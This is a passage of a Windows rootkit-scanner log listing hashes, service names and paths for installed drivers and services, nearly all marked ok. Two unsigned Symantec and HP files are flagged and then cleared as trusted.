12:16:46.0409 0x1aa8 BrFiltUp - ok
12:16:46.0415 0x1aa8 [ 5C2F352A4E961D72518261257AAE204B, 9EE1001E1D46A414A7A86FE1DBBE232203E26F54D9EF43ED31ED8EACD4D09853 ] BridgeMP C:\Windows\system32\DRIVERS\bridge.sys
12:16:46.0456 0x1aa8 BridgeMP - ok
12:16:46.0464 0x1aa8 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser C:\Windows\System32\browser.dll
12:16:46.0482 0x1aa8 Browser - ok
12:16:46.0494 0x1aa8 [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid C:\Windows\System32\Drivers\Brserid.sys
12:16:46.0519 0x1aa8 Brserid - ok
12:16:46.0525 0x1aa8 [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm C:\Windows\System32\Drivers\BrSerWdm.sys
12:16:46.0542 0x1aa8 BrSerWdm - ok
12:16:46.0546 0x1aa8 [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm C:\Windows\System32\Drivers\BrUsbMdm.sys
12:16:46.0563 0x1aa8 BrUsbMdm - ok
12:16:46.0567 0x1aa8 [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer C:\Windows\System32\Drivers\BrUsbSer.sys
12:16:46.0581 0x1aa8 BrUsbSer - ok
12:16:46.0585 0x1aa8 [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] BthEnum C:\Windows\system32\drivers\BthEnum.sys
12:16:46.0599 0x1aa8 BthEnum - ok
12:16:46.0605 0x1aa8 [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
12:16:46.0623 0x1aa8 BTHMODEM - ok
12:16:46.0630 0x1aa8 [ 02DD601B708DD0667E1331FA8518E9FF, 7DE6CC4DBB621CD03B01D9CE6CF66EAFE31D39030A391562CD0E278E1D70ADE1 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
12:16:46.0650 0x1aa8 BthPan - ok
12:16:46.0669 0x1aa8 [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] BTHPORT  C:\Windows\system32\Drivers\BTHport.sys
12:16:46.0698 0x1aa8 BTHPORT - ok
12:16:46.0705 0x1aa8 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv C:\Windows\system32\bthserv.dll
12:16:46.0742 0x1aa8 bthserv - ok
12:16:46.0747 0x1aa8 [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
12:16:46.0762 0x1aa8 BTHUSB - ok
12:16:46.0783 0x1aa8 [ 0E78584D5FACA0509DFA97BD8B635075, 5362BF3A7237361C4ACA64946BBA61F7C79737FFC35CC8E042A45CB9BE15132F ] btwampfl C:\Windows\system32\drivers\btwampfl.sys
12:16:46.0811 0x1aa8 btwampfl - ok
12:16:46.0821 0x1aa8 [ 409C4117E6027672EF41E68ACE1468AD, 8FB0A11E5147EEB245527E68FCD8FEC4BF5DC820BA1F99F983CDA10829DB4F5D ] btwaudio C:\Windows\system32\drivers\btwaudio.sys
12:16:46.0835 0x1aa8 btwaudio - ok
12:16:46.0843 0x1aa8 [ 8CA7CABD13316ABACE386D9F380B4CF3, 6BB8142760E3440543991A6C2A2B5CB7450E7936C9A9F9038622AAC0D79C7667 ] btwavdt C:\Windows\system32\DRIVERS\btwavdt.sys
12:16:46.0856 0x1aa8 btwavdt - ok
12:16:46.0891 0x1aa8 [ 1249EDE2280F9A1564C946AFDDCD59D5, 53DBE9FF35A229C013F017130ABC77F6632EA740545492CD741778B0E3705025 ] btwdins C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
12:16:46.0928 0x1aa8 btwdins - ok
12:16:46.0935 0x1aa8 [ 41933521A618475644B6E8D8487AF326, A50D6CF096E45E4EA2491D61CFE165C8C8A8956E699519C4314918DE1FD31056 ] BTWDPAN C:\Windows\system32\DRIVERS\btwdpan.sys
12:16:46.0947 0x1aa8 BTWDPAN - ok
12:16:46.0951 0x1aa8 [ B9354F9F111C64F2495B60F1E24CB453, 67B3F5867B00F84832EF5AD649D817D27B3F200351C7C53579A63D30F8E2BFDD ] btwl2cap C:\Windows\system32\DRIVERS\btwl2cap.sys
12:16:46.0962 0x1aa8 btwl2cap - ok
12:16:46.0966 0x1aa8 [ 71A04F2D9DEB21B162561EB574D7D629, C4E477F38CA3C76A966DA9145ABA55EE316BDEC84FE647DB06BCB1604EFE1A94 ] btwrchid C:\Windows\system32\DRIVERS\btwrchid.sys
12:16:46.0975 0x1aa8 btwrchid - ok
12:16:47.0016 0x1aa8 [ 72551A9AE5F68905DFC3CBA0D5242566, 15C273519C3AD1B2AF68F669125AFE607A86A60D680E299631D5E893C3CAA7E7 ] c2cautoupdatesvc C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
12:16:47.0069 0x1aa8 c2cautoupdatesvc - ok
12:16:47.0122 0x1aa8 [ 6B669A00A431FF6CDCE67458933F5F0F, 81419EB18BB4EB96E48C99A1D45B0267E779E135427B3AEC872A1A5DD810B23F ] c2cpnrsvc C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
12:16:47.0180 0x1aa8 c2cpnrsvc - ok
12:16:47.0192 0x1aa8 [ 248C952C82DF1E23775432774CBB20F1, D04D382E7963B84E4856534A2FA209787FEBA2B6F21F579CA8F7C6BE4AA10072 ] ccSet_MCLIENT C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys
12:16:47.0205 0x1aa8 ccSet_MCLIENT - ok
12:16:47.0214 0x1aa8 [ 0510396A957E9FD7205BA62D3CAE4528, C80C39EB3A87C5111132E96E966CF74ACABA36DE7714B545A707027D35995792 ] ccSet_NIS C:\Windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys
12:16:47.0228 0x1aa8 ccSet_NIS - ok
12:16:47.0234 0x1aa8 [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
12:16:47.0272 0x1aa8 cdfs - ok
12:16:47.0280 0x1aa8 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
12:16:47.0298 0x1aa8 cdrom - ok
12:16:47.0305 0x1aa8 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc C:\Windows\System32\certprop.dll
12:16:47.0350 0x1aa8 CertPropSvc - ok
12:16:47.0356 0x1aa8 [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass C:\Windows\system32\drivers\circlass.sys
12:16:47.0374 0x1aa8 circlass - ok
12:16:47.0389 0x1aa8 [ FE1EC06F2253F691FE36217C592A0206, B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE ] CLFS C:\Windows\system32\CLFS.sys
12:16:47.0411 0x1aa8 CLFS - ok
12:16:47.0418 0x1aa8 [ D88040F816FDA31C3B466F0FA0918F29, 39D3630E623DA25B8444B6D3AAAB16B98E7E289C5619E19A85D47B74C71449F3 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
12:16:47.0431 0x1aa8 clr_optimization_v2.0.50727_32 - ok
12:16:47.0438 0x1aa8 [ D1CEEA2B47CB998321C579651CE3E4F8, 654013B8FD229A50017B08DEC6CA19C7DDA8CE0771260E057A92625201D539B1 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
12:16:47.0452 0x1aa8 clr_optimization_v2.0.50727_64 - ok
12:16:47.0461 0x1aa8 [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
12:16:47.0484 0x1aa8 clr_optimization_v4.0.30319_32 - ok
12:16:47.0493 0x1aa8 [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
12:16:47.0511 0x1aa8 clr_optimization_v4.0.30319_64 - ok
12:16:47.0516 0x1aa8 [ 50F92C943F18B070F166D019DFAB3D9A, A997EAFFC1598B1D0A9E1A4475F25418CA8AA6B703B53A71B1AF028E247C9950 ] clwvd C:\Windows\system32\DRIVERS\clwvd.sys
12:16:47.0526 0x1aa8 clwvd - ok
12:16:47.0531 0x1aa8 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt C:\Windows\system32\drivers\CmBatt.sys
12:16:47.0544 0x1aa8 CmBatt - ok
12:16:47.0549 0x1aa8 [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide C:\Windows\system32\drivers\cmdide.sys
12:16:47.0560 0x1aa8 cmdide - ok
12:16:47.0578 0x1aa8 [ EBF28856F69CF094A902F884CF989706, AD6C9F0BC20AA49EEE5478DA0F856F0EA2B414B63208C5FFB03C9D7F5B59765F ] CNG C:\Windows\system32\Drivers\cng.sys
12:16:47.0608 0x1aa8 CNG - ok
12:16:47.0612 0x1aa8 [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt C:\Windows\system32\drivers\compbatt.sys
12:16:47.0624 0x1aa8 Compbatt - ok
12:16:47.0629 0x1aa8 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus C:\Windows\system32\drivers\CompositeBus.sys
12:16:47.0645 0x1aa8 CompositeBus - ok
12:16:47.0649 0x1aa8 COMSysApp - ok
12:16:47.0654 0x1aa8 [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
12:16:47.0666 0x1aa8 crcdisk - ok
12:16:47.0676 0x1aa8 [ 6B400F211BEE880A37A1ED0368776BF4, 2F27C6FA96A1C8CBDA467846DA57E63949A7EA37DB094B13397DDD30114295BD ] CryptSvc C:\Windows\system32\cryptsvc.dll
12:16:47.0694 0x1aa8 CryptSvc - ok
12:16:47.0723 0x1aa8 [ FD557A50A65E44041CD2FCEF4BEB04DB, 746D5958F7198895D35A23566D3736D993D57726BF59D91421D8091C48926A26 ] cvhsvc C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
12:16:47.0756 0x1aa8 cvhsvc - ok
12:16:47.0777 0x1aa8 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] DcomLaunch C:\Windows\system32\rpcss.dll
12:16:47.0830 0x1aa8 DcomLaunch - ok
12:16:47.0842 0x1aa8 [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc C:\Windows\System32\defragsvc.dll
12:16:47.0887 0x1aa8 defragsvc - ok
12:16:47.0893 0x1aa8 [ 9BB2EF44EAA163B29C4A4587887A0FE4, 03667BC3EA5003F4236929C10F23D8F108AFCB29DB5559E751FB26DFB318636F ] DfsC C:\Windows\system32\Drivers\dfsc.sys
12:16:47.0931 0x1aa8 DfsC - ok
12:16:47.0937 0x1aa8 [ 1E0F456A03E204F92D24437CD907A512, 8BB28AF33BDEFFECC4EC5C6BFBFBDA525A32FA6A26382353E01FF94BAD2A200C ] dg_ssudbus C:\Windows\system32\DRIVERS\ssudbus.sys
12:16:47.0951 0x1aa8 dg_ssudbus - ok
12:16:47.0963 0x1aa8 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp C:\Windows\system32\dhcpcore.dll
12:16:47.0987 0x1aa8 Dhcp - ok
12:16:47.0992 0x1aa8 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache C:\Windows\system32\drivers\discache.sys
12:16:48.0031 0x1aa8 discache - ok
12:16:48.0037 0x1aa8 [ 9819EEE8B5EA3784EC4AF3B137A5244C, 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427 ] Disk C:\Windows\system32\drivers\disk.sys
12:16:48.0050 0x1aa8 Disk - ok
12:16:48.0060 0x1aa8 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache C:\Windows\System32\dnsrslvr.dll
12:16:48.0079 0x1aa8 Dnscache - ok
12:16:48.0091 0x1aa8 [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc C:\Windows\System32\dot3svc.dll
12:16:48.0145 0x1aa8 dot3svc - ok
12:16:48.0155 0x1aa8 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS C:\Windows\system32\dps.dll
12:16:48.0198 0x1aa8 DPS - ok
12:16:48.0202 0x1aa8 [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
12:16:48.0215 0x1aa8 drmkaud - ok
12:16:48.0247 0x1aa8 [ 53BD875C7C0808235BFB803C1A8BE009, E56CFA0BD65E09C5F6957E1BF89824A3DF53E715A5BAE5B649D85C3AFF23D2C4 ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
12:16:48.0283 0x1aa8 DXGKrnl - ok
12:16:48.0290 0x1aa8 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\Windows\System32\eapsvc.dll
12:16:48.0329 0x1aa8 EapHost - ok
12:16:48.0421 0x1aa8 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\Windows\system32\drivers\evbda.sys
12:16:48.0544 0x1aa8 ebdrv - ok
12:16:48.0565 0x1aa8 [ 1B7AA375F711F66D5FF2B855F9EC987F, 151E3897A31F0E828D08EBBB9C10A60047B48534BB38349EF1C8D9245524CA58 ] eeCtrl C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys
12:16:48.0587 0x1aa8 eeCtrl - ok
12:16:48.0592 0x1aa8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] EFS C:\Windows\System32\lsass.exe
12:16:48.0607 0x1aa8 EFS - ok
12:16:48.0631 0x1aa8 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
12:16:48.0670 0x1aa8 ehRecvr - ok
12:16:48.0677 0x1aa8 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\Windows\ehome\ehsched.exe
12:16:48.0694 0x1aa8 ehSched - ok
12:16:48.0713 0x1aa8 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\Windows\system32\drivers\elxstor.sys
12:16:48.0740 0x1aa8 elxstor - ok
12:16:48.0748 0x1aa8 [ 7230C8B80DDE1F0524C353240B78CC0E, 15F73EBFB9152010E7736AFE518A47C209E17DDB347A40C4CDA0D9BBD26D1176 ] EraserUtilRebootDrv C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys
12:16:48.0760 0x1aa8 EraserUtilRebootDrv - detected UnsignedFile.Multi.Generic ( 1 )
12:16:51.0679 0x1aa8 Detect skipped due to KSN trusted
12:16:51.0679 0x1aa8 EraserUtilRebootDrv - ok
12:16:51.0684 0x1aa8 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\Windows\system32\drivers\errdev.sys
12:16:51.0699 0x1aa8 ErrDev - ok
12:16:51.0718 0x1aa8 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\Windows\system32\es.dll
12:16:51.0768 0x1aa8 EventSystem - ok
12:16:51.0777 0x1aa8 [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat C:\Windows\system32\drivers\exfat.sys
12:16:51.0821 0x1aa8 exfat - ok
12:16:51.0831 0x1aa8 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat C:\Windows\system32\drivers\fastfat.sys
12:16:51.0873 0x1aa8 fastfat - ok
12:16:51.0896 0x1aa8 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\Windows\system32\fxssvc.exe
12:16:51.0930 0x1aa8 Fax - ok
12:16:51.0935 0x1aa8 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\Windows\system32\drivers\fdc.sys
12:16:51.0949 0x1aa8 fdc - ok
12:16:51.0953 0x1aa8 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\Windows\system32\fdPHost.dll
12:16:51.0990 0x1aa8 fdPHost - ok
12:16:51.0994 0x1aa8 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\Windows\system32\fdrespub.dll
12:16:52.0033 0x1aa8 FDResPub - ok
12:16:52.0038 0x1aa8 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
12:16:52.0051 0x1aa8 FileInfo - ok
12:16:52.0055 0x1aa8 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\Windows\system32\drivers\filetrace.sys
12:16:52.0096 0x1aa8 Filetrace - ok
12:16:52.0101 0x1aa8 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\Windows\system32\drivers\flpydisk.sys
12:16:52.0115 0x1aa8 flpydisk - ok
12:16:52.0127 0x1aa8 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
12:16:52.0144 0x1aa8 FltMgr - ok
12:16:52.0155 0x1aa8 [ 5F3982B51A5DF6F7FF5FD3A4CE0BFF5D, 99F99A96A310B701981B55F287C3685CBBBA3D7B810675C90DD78E4CE4E12180 ] FLxHCIc C:\Windows\system32\DRIVERS\FLxHCIc.sys
12:16:52.0172 0x1aa8 FLxHCIc - ok
12:16:52.0178 0x1aa8 [ 1ACB3F124140A2EAB5A1E36286E37C0D, C0D00E1BF4D501A1D6DC97B9DE378867C9FDEFF6B4E17054DC1F1EC8F958D4C8 ] FLxHCIh C:\Windows\system32\DRIVERS\FLxHCIh.sys
12:16:52.0189 0x1aa8 FLxHCIh - ok
12:16:52.0225 0x1aa8 [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] FontCache C:\Windows\system32\FntCache.dll
12:16:52.0278 0x1aa8 FontCache - ok
12:16:52.0287 0x1aa8 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
12:16:52.0298 0x1aa8 FontCache3.0.0.0 - ok
12:16:52.0310 0x1aa8 [ F80BDC0D9E7B9595E74B434446AD3781, 383EC0F485D3E12D198343A0AD7BEEECFD2A569E73672345964CED38CAF34D83 ] FPLService C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
12:16:52.0326 0x1aa8 FPLService - ok
12:16:52.0332 0x1aa8 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys
12:16:52.0345 0x1aa8  FsDepends - ok
12:16:52.0349 0x1aa8 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
12:16:52.0362 0x1aa8 Fs_Rec - ok
12:16:52.0371 0x1aa8 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys
12:16:52.0391 0x1aa8 fvevol - ok
12:16:52.0397 0x1aa8 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
12:16:52.0411 0x1aa8 gagp30kx - ok
12:16:52.0419 0x1aa8 [ C403C5DB49A0F9AAF4F2128EDC0106D8, 3C6948B63278022D8182F773C5FA15784514F76C1546118DDBADBA322B962D12 ] GamesAppService C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
12:16:52.0434 0x1aa8 GamesAppService - ok
12:16:52.0460 0x1aa8 [ 277BBC7E1AA1EE957F573A10ECA7EF3A, 2EE60B924E583E847CC24E78B401EF95C69DB777A5B74E1EC963E18D47B94D24 ] gpsvc C:\Windows\System32\gpsvc.dll
12:16:52.0523 0x1aa8 gpsvc - ok
12:16:52.0532 0x1aa8 [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
12:16:52.0543 0x1aa8 gupdate - ok
12:16:52.0549 0x1aa8 [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
12:16:52.0561 0x1aa8 gupdatem - ok
12:16:52.0571 0x1aa8 [ 5D4BC124FAAE6730AC002CDB67BF1A1C, 00294F4DC7D17F6DD2A22B9C3299BED40146BA45C972367154D20DB502472551 ] gusvc C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
12:16:52.0586 0x1aa8 gusvc - ok
12:16:52.0591 0x1aa8 [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys
12:16:52.0607 0x1aa8 hcw85cir - ok
12:16:52.0620 0x1aa8 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
12:16:52.0649 0x1aa8 HdAudAddService - ok
12:16:52.0656 0x1aa8 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\Windows\system32\drivers\HDAudBus.sys
12:16:52.0676 0x1aa8 HDAudBus - ok
12:16:52.0684 0x1aa8 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\Windows\system32\drivers\HidBatt.sys
12:16:52.0699 0x1aa8 HidBatt - ok
12:16:52.0709 0x1aa8 [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth C:\Windows\system32\drivers\hidbth.sys
12:16:52.0729 0x1aa8 HidBth - ok
12:16:52.0734 0x1aa8 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\Windows\system32\drivers\hidir.sys
12:16:52.0751 0x1aa8 HidIr - ok
12:16:52.0756 0x1aa8 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\Windows\System32\hidserv.dll
12:16:52.0795 0x1aa8 hidserv - ok
12:16:52.0799 0x1aa8 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
12:16:52.0815 0x1aa8 HidUsb - ok
12:16:52.0822 0x1aa8 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\Windows\system32\kmsvc.dll
12:16:52.0860 0x1aa8 hkmsvc - ok
12:16:52.0870 0x1aa8 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
12:16:52.0891 0x1aa8 HomeGroupListener - ok
12:16:52.0900 0x1aa8 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
12:16:52.0920 0x1aa8 HomeGroupProvider - ok
12:16:52.0926 0x1aa8 [ BB1FC298BE53AAB1E110F6E786BD8AC5, C2DA2C3CE96D5F8B50013063B5EF7BED7478636896C709A7AF34855B2E69B9F1 ] HP Support Assistant Service C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
12:16:52.0934 0x1aa8 HP Support Assistant Service - detected UnsignedFile.Multi.Generic ( 1 )
12:16:59.0658 0x1aa8 Detect skipped due to KSN trusted
12:16:59.0658 0x1aa8 HP Support Assistant Service - ok
12:16:59.0672 0x1aa8 [ 6A181452D4E240B8ECC7614B9A19BDE9, 3E458A737DA597DF007D278E9D81F2BF259AB4B97A4C188CEDAEA1F144B1074F ] HPClientSvc C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
12:16:59.0690 0x1aa8 HPClientSvc - ok
12:16:59.0721 0x1aa8 [ 9B7EDD3FE7C211C36E921D34D18A3A0A, 03A450F85A042F9668D1560FA2B8B89783568C87CDB1A8685CDA2AC9FE3761C3 ] hpqwmiex C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
12:16:59.0755 0x1aa8 hpqwmiex - ok
